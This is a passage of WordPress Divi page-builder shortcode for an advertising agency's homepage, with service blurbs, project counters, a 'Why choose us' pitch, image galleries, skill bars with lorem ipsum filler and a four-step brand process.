use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" 